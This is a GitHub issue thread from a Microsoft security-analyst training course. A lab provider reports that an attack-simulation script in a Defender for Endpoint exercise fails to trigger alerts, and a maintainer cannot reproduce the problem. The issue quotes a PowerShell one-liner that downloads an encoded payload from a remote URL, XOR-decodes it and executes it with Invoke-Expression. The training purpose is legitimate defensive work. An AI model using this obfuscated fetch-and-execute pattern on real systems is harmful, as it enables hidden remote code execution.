MicrosoftLearning / SC-200T00A-Microsoft-Security-Operations-Analyst

MIT License

Learning Path 2 - Lab 1 - Exercise 2 - Mitigate Attacks with Microsoft Defender for Endpoint - Issue #287

Closed SkillableKA closed 1 month ago

SkillableKA commented 1 month ago

Contact Details

kyle.asberry@skillable.com

What happened?

Exercise : 2 Task: 3 Step: 3

Description of issue: When running the provided PowerShell script, it will complete with no errors and launch the notepad as intended, but the injection does not run. It will never generate the incident alert as intended. Execution Policy, firewall settings, etc. have no effect on the results. Students are unable to proceed with Task 4 as the 'Multi-stage incident involving Defense evasion & Discovery on one endpoint' never populates.

```powershell
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection'); $base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0; $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i]; $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
```

Repro steps:

  1. Run script and attack.ps1 in all variations of PowerShell/CMD.
  2. Set execution status to both RemoteSigned and Bypass.
  3. Fully disable Windows firewall.

Lab

Lab 02 Exercise 02 Mitigate Attacks with Microsoft Defender for Endpoint

Relevant screenshots



KenMAG commented 1 month ago

Hi @SkillableKA, I have no way to verify this as I cannot get a lab environment with an Azure pass. Also, using the script file was only a workaround if you couldn't copy and run the script directly in PowerShell. The last time I tried this it worked fine.

KenMAG commented 1 month ago

Hi @SkillableKA, the script ran fine with no modification to the instructions and created alerts and an incident.

KenMAG commented 1 month ago

I'm closing this (for now) as I cannot reproduce the problem.